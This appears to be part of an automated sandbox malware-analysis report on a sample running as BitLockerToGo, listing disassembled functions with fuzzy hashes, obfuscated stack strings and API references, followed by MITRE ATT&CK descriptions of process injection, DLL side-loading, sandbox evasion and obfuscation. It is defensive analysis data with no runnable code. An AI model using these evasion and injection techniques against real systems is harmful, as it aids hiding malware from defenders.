Opcode Fuzzy Hash: d0f3d2b183563610966c50934ddef5f415b2464633e576ef3d032d980e4f42d1
Instruction Fuzzy Hash: C0016173A19D210BA318CD3D8C1516A7AE29BD5330B19C77DBCB5C73D4D974C8168685

Function 0041D950 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9e7bc496cf581f85eaed77d67b391d443465b375fcb6f19d8a8b2a1bdcbeefe
Instruction ID: 78d57952aaccbb719d55e3a321b2297b67e4da979ccb95941750233ce991b253
Opcode Fuzzy Hash: b9e7bc496cf581f85eaed77d67b391d443465b375fcb6f19d8a8b2a1bdcbeefe
Instruction Fuzzy Hash: 54115E72B299100B874CCD3CDC2216B7ED29B86330B29C72EB9B6C72E4D62488054655

Function 00411C10 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 188bf72582b7a214080a52313ebb0d089423aab2b4c467c05e0875be94f1b2e9
Instruction ID: 6fea2fc187b85985eeaf972a617f5fa195a71416d77d002f396c3670aad6416f
Opcode Fuzzy Hash: 188bf72582b7a214080a52313ebb0d089423aab2b4c467c05e0875be94f1b2e9
Instruction Fuzzy Hash: CE116D73A299211B9748DD3D8D510177FE39FC6270B298B2EB8F9C72E4C634C8068685

Function 0041C3F0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9bb7b1419f3308d404fcd18b1cb2ca0e68a32de76eb14c9c0e0ca30f841a6bb
Instruction ID: 0d1fd42b1fadc7d5e933006e1f4b18041f161f50f637505ed5f416f293c02aa4
Opcode Fuzzy Hash: c9bb7b1419f3308d404fcd18b1cb2ca0e68a32de76eb14c9c0e0ca30f841a6bb
Instruction Fuzzy Hash: 26018C72E55A210B8748CD3D8C1216BBED25FC6730B29C72EB8F6D72E4D638CD114692

Function 00434AB0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31756057a54d39baeea58ca6a1147e434dbe25cb24276700cc8e54628be8892e
Instruction ID: 04c2e09e4b24eca85b76c569751819b948da31c0ae3194a0cc341098ccdebddd
Opcode Fuzzy Hash: 31756057a54d39baeea58ca6a1147e434dbe25cb24276700cc8e54628be8892e
Instruction Fuzzy Hash: 0A019273E18A210B8748CD3CDC1116ABEE15B96330B158B2DB8F6C73E4D624CD148681

Function 0042DBF0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02a07654e9bbf400da37a7bac42add0f255050d79de6f54395d69a0b2cc1355e
Instruction ID: af78ce10face7503b1a87087ace5389446c12d63b98bb442330c89798a46bcd7
Opcode Fuzzy Hash: 02a07654e9bbf400da37a7bac42add0f255050d79de6f54395d69a0b2cc1355e
Instruction Fuzzy Hash: A0012D72E68A614B9358CD3D9D0416ABED35FD5630B29CB28B8B4D73E4D238C9154681

Function 00429EB0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e9b42f36763e991704474c91541f07a73f76039d86502019d23c1ec0c956e32
Instruction ID: cab95b69cea9e59f00a2ba6b904942efa048c854f647c6536765e113a00d912d
Opcode Fuzzy Hash: 5e9b42f36763e991704474c91541f07a73f76039d86502019d23c1ec0c956e32
Instruction Fuzzy Hash: E9017173A299220B8348CE3D8C5015B7ED25FC6730F29CB2DB9F5D72E4D634C951469A

Function 0043FF80 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d79df3b25a044a9a67a30d7da660d9caf049bb3aab077c49bbc31d2ab090867
Instruction ID: d3b48a85a72e0ea1d6af7105b229be25be3805b703c0fb3ac753d7db5384eccc
Opcode Fuzzy Hash: 9d79df3b25a044a9a67a30d7da660d9caf049bb3aab077c49bbc31d2ab090867
Instruction Fuzzy Hash: 3D012573A299210B875CDD3DDC2156B7AD15BD5630B19873DBEF6C73E0D234C8144645

Function 0041C5F0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 893224e8b703533ec4b0670196f2abd1270833bb265d03d786339d17901e5cd1
Instruction ID: 25228f91c58863f8ea8a3ed33edc6772d3c09a79d375e13e7d63e3798596c91c
Opcode Fuzzy Hash: 893224e8b703533ec4b0670196f2abd1270833bb265d03d786339d17901e5cd1
Instruction Fuzzy Hash: CC017173A149100BC708DD3CCC2166B7AD19BC5230F19873DBAB6CB3D0D638C8018685

Function 004293D0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction ID: ebe3de88c9896f3d729425efb416481bae628ef6b53856183563c0c5513dae33
Opcode Fuzzy Hash: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction Fuzzy Hash: 2E01D677A053228B8324DE5CC4D0AABB3B0FF85794F6A446ED5402F371D7319D5AC269

Function 0042A120 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de56b79a2ff901c5de58585ba6a0c5ba3e9d0043685b364311e7a0d6d9c051d0
Instruction ID: a7486681f2de42ad996fee9212f3a6d44f2ed9d77fa5094272dd945e6a0cc7b7
Opcode Fuzzy Hash: de56b79a2ff901c5de58585ba6a0c5ba3e9d0043685b364311e7a0d6d9c051d0
Instruction Fuzzy Hash: 54017C73A289000B8348DE3CDC2216B7AD29FC6330F28CB2DB6F6C72E4D634C9144655

Function 0041D500 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 559d24c100b062f7687ed8dcf16b1833a6ed00e185e1eb692788768db6617e81
Instruction ID: 7c01c0f8ecf7d162ca6e25d32582066e725ab59b4a5a5fd5c569b0b12567c02f
Opcode Fuzzy Hash: 559d24c100b062f7687ed8dcf16b1833a6ed00e185e1eb692788768db6617e81
Instruction Fuzzy Hash: A8017172A299510B874CDD3CCD2127B7FD19F95730F18872DB5F6C62E5C624C9104645

Function 00406B40 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a9c5d21dc3ad7b459c32bae201144eb4ef48733f592471e51c547bd8d1b8e3f
Instruction ID: 15a47c340a0e345f229c8e1e48b9ed769f52c40962e92e34d8079907aacf4393
Opcode Fuzzy Hash: 4a9c5d21dc3ad7b459c32bae201144eb4ef48733f592471e51c547bd8d1b8e3f
Instruction Fuzzy Hash: DFF0B47BB1962A0BE311DD7ADC9093BB3A6E7C5315F1A4139E942E3342D539F80182A8

Function 0041B580 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8f3f529051ece374a8ab50b280e8175868ff4c44bff52d2df49d9797fbebef9
Instruction ID: 9e419523a29845060ab0c439a4bd7e2d83567a0fb5dd19e91e192ef35b8ed230
Opcode Fuzzy Hash: f8f3f529051ece374a8ab50b280e8175868ff4c44bff52d2df49d9797fbebef9
Instruction Fuzzy Hash: 86F0ECB17041107BDB23DB559CC0FB7BBDDCF8B358F190416E84957242D2669885C3E9

Function 0044A2E0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b94d5dc2245598cd85b3b2c24f66699730772914651bf2d20df20caa6d5b4bde
Instruction ID: 76bfc4d1fa90abc10040704a51054ebfb816869a6eedea7628519e8d0329c70c
Opcode Fuzzy Hash: b94d5dc2245598cd85b3b2c24f66699730772914651bf2d20df20caa6d5b4bde
Instruction Fuzzy Hash: E9E012B8C013087F8754EFA9DE4B96EBE78DB06200F541119F851B7345D63058198BDA

Function 00444EF0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: 75979c2099265564824d8bf77596cf40a556d3a2ad35aa400f78525f245c6a41
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction Fuzzy Hash: 74D0A7216083214AAB748E19B401A77F7F0EAC7B12F49955FFA82E3248D234DC41C2BD

Function 00438188 Relevance: 54.4, APIs: 1, Strings: 30, Instructions: 145memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0043824D

Strings

G, xrefs: 004381CE
C, xrefs: 004381AE
d, xrefs: 0043838F
R, xrefs: 00438303
", xrefs: 004382C7
(, xrefs: 004382BD
!, xrefs: 0043828B
Q, xrefs: 004382F9
g, xrefs: 004383CF
y, xrefs: 004383EF
', xrefs: 00438268
!, xrefs: 004382EF
;, xrefs: 004382DB
h, xrefs: 004383DF
w, xrefs: 004383FF
#, xrefs: 004382D1
g, xrefs: 0043833F
E, xrefs: 004381BE
#, xrefs: 00438321
k, xrefs: 0043837F
F, xrefs: 004381C6
c, xrefs: 004383BF
!, xrefs: 00438272
2, xrefs: 00438295
z, xrefs: 0043836F
h, xrefs: 0043834F
n, xrefs: 00438335
#, xrefs: 0043827C
A, xrefs: 0043819E
u, xrefs: 0043839F

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID: !$!$!$"$#$#$#$'$($2$;$A$C$E$F$G$Q$R$c$d$g$g$h$h$k$n$u$w$y$z
API String ID: 2525500382-667399296
Opcode ID: 854d012b6a2c7312f9bcaab3afe6d5206606930865006b50c367c5e629bedfcc
Instruction ID: 37edf73817765767ab5d693eb592ba63c4f0857598120437ada202043438cf7e
Opcode Fuzzy Hash: 854d012b6a2c7312f9bcaab3afe6d5206606930865006b50c367c5e629bedfcc
Instruction Fuzzy Hash: 6291812050CBC28DD332867C954878FBFD16BA7224F184B9DE1E94A3D2D7B58505CB67

Function 0043904C Relevance: 54.4, APIs: 1, Strings: 30, Instructions: 142memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00439119

Strings

A, xrefs: 0043906A
z, xrefs: 00439239
!, xrefs: 004391B9
h, xrefs: 00439219
c, xrefs: 00439289
E, xrefs: 0043908A
d, xrefs: 00439259
C, xrefs: 0043907A
g, xrefs: 00439209
#, xrefs: 004391EB
', xrefs: 00439132
!, xrefs: 00439155
Q, xrefs: 004391C3
G, xrefs: 0043909A
u, xrefs: 00439269
", xrefs: 00439191
y, xrefs: 004392B9
2, xrefs: 0043915F
!, xrefs: 0043913C
k, xrefs: 00439249
#, xrefs: 0043919B
n, xrefs: 004391FF
;, xrefs: 004391A5
R, xrefs: 004391CD
(, xrefs: 00439187
g, xrefs: 00439299
F, xrefs: 00439092
#, xrefs: 00439146
h, xrefs: 004392A9
w, xrefs: 004392C9

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID: !$!$!$"$#$#$#$'$($2$;$A$C$E$F$G$Q$R$c$d$g$g$h$h$k$n$u$w$y$z
API String ID: 2525500382-667399296
Opcode ID: a854221980c4e4d0ed5b1c56075fcf6899989a05649d250372f757d0a318eff0
Instruction ID: 1918faaba6c76e77e1fbb096d1af14ab484d4c231a7193266e84285764c812cf
Opcode Fuzzy Hash: a854221980c4e4d0ed5b1c56075fcf6899989a05649d250372f757d0a318eff0
Instruction Fuzzy Hash: E891706050CBC189D332867C944878FBFD16BA3228F184F9DE1E94A2E2C6B98549D767

Function 0043A98D Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 95COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0043A9CF

Strings

I, xrefs: 0043A9E5
p, xrefs: 0043AA41
}, xrefs: 0043AA35
M, xrefs: 0043A9F5
O, xrefs: 0043A9ED
C, xrefs: 0043A9FD
A, xrefs: 0043AA05
G, xrefs: 0043AA0D
{, xrefs: 0043AA1D
E, xrefs: 0043AA15
y, xrefs: 0043AA25
q, xrefs: 0043AA45
s, xrefs: 0043AA3D

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitVariant
String ID: A$C$E$G$I$M$O$p$q$s$y${$}
API String ID: 1927566239-403548044
Opcode ID: 24b653d5aa5335ba51ffca3de8c18d5460bb5d109352c1648abe98403669f469
Instruction ID: d0d837a2284370cd8acddf503c49baae4329f6734ed921866b3a395aba7c4ad0
Opcode Fuzzy Hash: 24b653d5aa5335ba51ffca3de8c18d5460bb5d109352c1648abe98403669f469
Instruction Fuzzy Hash: E4410670408781CED725DF28C494716BFE0AB26314F08869CD8DA4F397D379E559CBA6

Function 0043B0D8 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 83COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0043B104

Strings

A, xrefs: 0043B13A
{, xrefs: 0043B152
s, xrefs: 0043B172
O, xrefs: 0043B122
}, xrefs: 0043B16A
q, xrefs: 0043B17A
G, xrefs: 0043B142
C, xrefs: 0043B132
p, xrefs: 0043B176
y, xrefs: 0043B15A
I, xrefs: 0043B11A
M, xrefs: 0043B12A
E, xrefs: 0043B14A

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitVariant
String ID: A$C$E$G$I$M$O$p$q$s$y${$}
API String ID: 1927566239-403548044
Opcode ID: f1a8c1c37f7d7b64b378141728f219d010845369990e263169e862bbd8966859
Instruction ID: 1f698c37626dbd18c4354a3a74cc8de2cfcbb25e21f7b4af0c910e541d0fbf9c
Opcode Fuzzy Hash: f1a8c1c37f7d7b64b378141728f219d010845369990e263169e862bbd8966859
Instruction Fuzzy Hash: 7241C4604087818ED726DF28C498716BFE06B66214F088A9DD8D94F3D7C379E919CBA6

Function 00438BFC Relevance: 22.8, APIs: 2, Strings: 11, Instructions: 80COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00438C06
VariantInit.OLEAUT32 ref: 00438C19

Strings

A, xrefs: 00438C37
Q, xrefs: 00438C77
., xrefs: 00438C67
*, xrefs: 00438C87
Y, xrefs: 00438CB7
I, xrefs: 00438CD7
v, xrefs: 00438CA7
$, xrefs: 00438C47
:, xrefs: 00438CC7
(, xrefs: 00438C97
+, xrefs: 00438C57

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: $$($*$+$.$:$A$I$Q$Y$v
API String ID: 2610073882-2465205239
Opcode ID: 14545c1a4b63c5424543c3b245f544ef29dc8e5ffa80aa41a28f3baaca1937a1
Instruction ID: 8017804432df0cedd0a661856ce7f4be665cb2eb239c5d3ff279044ac3a56af9
Opcode Fuzzy Hash: 14545c1a4b63c5424543c3b245f544ef29dc8e5ffa80aa41a28f3baaca1937a1
Instruction Fuzzy Hash: 7E41F37100C7C18ED332DB2894987DABFE0ABAA324F484A9DE4E8873D2C7744655CB57

Function 0043939A Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 84COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 004393A4
VariantInit.OLEAUT32 ref: 004393B7

Strings

6, xrefs: 00439445
;, xrefs: 00439475
3, xrefs: 00439495
+, xrefs: 00439435
-, xrefs: 004393F5
7, xrefs: 004393E5
!, xrefs: 00439405
;, xrefs: 00439455
%, xrefs: 00439485
8, xrefs: 00439415

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$%$+$-$3$6$7$8$;$;
API String ID: 2610073882-4178793300
Opcode ID: 35b10d924be5faf9cd2467fbe19f7860a0f0ede64c03c2dea02de5613b07f8f3
Instruction ID: 1a0f57506ffac19f1f70bda1fc0a8ae0304e7fedcb980c9135fb74b3ca58e83d
Opcode Fuzzy Hash: 35b10d924be5faf9cd2467fbe19f7860a0f0ede64c03c2dea02de5613b07f8f3
Instruction Fuzzy Hash: FD51927000CBC2CED3369B2899487DBBFE0ABA6325F080A5DD4E94A3E2D6754146DB57

Function 00438A66 Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 68COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00438A70

Strings

#, xrefs: 00438AB6
!, xrefs: 00438AA6
;, xrefs: 00438AF6
:, xrefs: 00438AFE
9, xrefs: 00438AE6
=, xrefs: 00438AC6
?, xrefs: 00438AD6
5, xrefs: 00438B06
y, xrefs: 00438A8E
', xrefs: 00438A96

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitVariant
String ID: !$#$'$5$9$:$;$=$?$y
API String ID: 1927566239-1641479931
Opcode ID: 664b4544e443e79bb00325c4761d179e4beb29f7968acc89ba9b868b4394a5b8
Instruction ID: 5dc34f154cdfd1e31294610d787368bedda606332db4e22643e1f22214d1d843
Opcode Fuzzy Hash: 664b4544e443e79bb00325c4761d179e4beb29f7968acc89ba9b868b4394a5b8
Instruction Fuzzy Hash: 9E41BD7010C3C1CAD3329B38D0587DABBE4ABAA358F84895EE4DD87282C7759506CB67

Function 00413C1C Relevance: 15.3, APIs: 1, Strings: 9, Instructions: 324COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 00413C45

Strings

&/.1, xrefs: 00413FFB
L+%-, xrefs: 00413FF0
X0, xrefs: 00413C53
u'E!, xrefs: 004140A4, 004140AD
\_, xrefs: 00414073
G%E, xrefs: 00413CCA
E#S%, xrefs: 00413FDA
@'A), xrefs: 00413FE5
h, xrefs: 00413D8D

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: Uninitialize
String ID: &/.1$@'A)$E#S%$G%E$L+%-$X0$\_$h$u'E!
API String ID: 3861434553-2682984677
Opcode ID: f1ff01c030d957714aa2441dce176ae9eece9d260410a314c2c5b6387a0016bc
Instruction ID: d5b35c6e2e3765ff3527373cf9a55279e5c93d76490935a06593b9bcb277243e
Opcode Fuzzy Hash: f1ff01c030d957714aa2441dce176ae9eece9d260410a314c2c5b6387a0016bc
Instruction Fuzzy Hash: C7B1477400C3C08AD7B1CF159494BDFBBE5AB96705F04485EE4D99B242C739858ACFA7

Function 00435992 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 205COMMON

Download Yara Rule

Strings

'*.!, xrefs: 00435B27
+"'), xrefs: 00435B35
??58, xrefs: 00435B3C
XC, xrefs: 0043598C

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: XC$'*.!$+"')$??58
API String ID: 0-3929688576
Opcode ID: 3f0ad4636486edb4715b0661a605d2d31425cbfc9787d058f7210975c02d3c4d
Instruction ID: 552f05c45b58ec852b7d12e5ed03fec727081af5e631eeeae1f9546cd02ce2ff
Opcode Fuzzy Hash: 3f0ad4636486edb4715b0661a605d2d31425cbfc9787d058f7210975c02d3c4d
Instruction Fuzzy Hash: 9461C171504B408FE7318F25C881B53BBE1BF56314F544A5EE4E64BB82D738B50ACBA5

Function 00436408 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 201COMMON

Download Yara Rule

Strings

'*.!, xrefs: 0043658E
+"'), xrefs: 0043659C
??58, xrefs: 004365A3

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: '*.!$+"')$??58
API String ID: 0-2832526936
Opcode ID: e821010c8a1525b7b8e3c1a7a7824ae6e75e19415711d44db3c7bbf4655f2bb4
Instruction ID: 14ece3139bbcc8e9c66a84dd95918500782679a60817824dfc202bcd02d9cac9
Opcode Fuzzy Hash: e821010c8a1525b7b8e3c1a7a7824ae6e75e19415711d44db3c7bbf4655f2bb4
Instruction Fuzzy Hash: 0B61E271404B419FE7318F25C881B93BBF1AF66314F148A5DD0E64BB82D738B409CBA5

Function 00442AD8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00442B5C

Strings

7o=m, xrefs: 00442AF0
Ig:e, xrefs: 00442AE0
hw, xrefs: 00442B00

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID: 7o=m$Ig:e$hw
API String ID: 2525500382-3932109727
Opcode ID: 4051783e72522058f6e1d57f995da734ea84b93e107c3866d4e0ffe6bfe1033f
Instruction ID: f177920e21d315e03892c01a8fc5deef3cff2d8b6169e092374fd9c448258232
Opcode Fuzzy Hash: 4051783e72522058f6e1d57f995da734ea84b93e107c3866d4e0ffe6bfe1033f
Instruction Fuzzy Hash: 80011EB4108341ABD3508F15D588A0FBBF4EF8A399F90991CF4C98A262C735D8818B1A

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

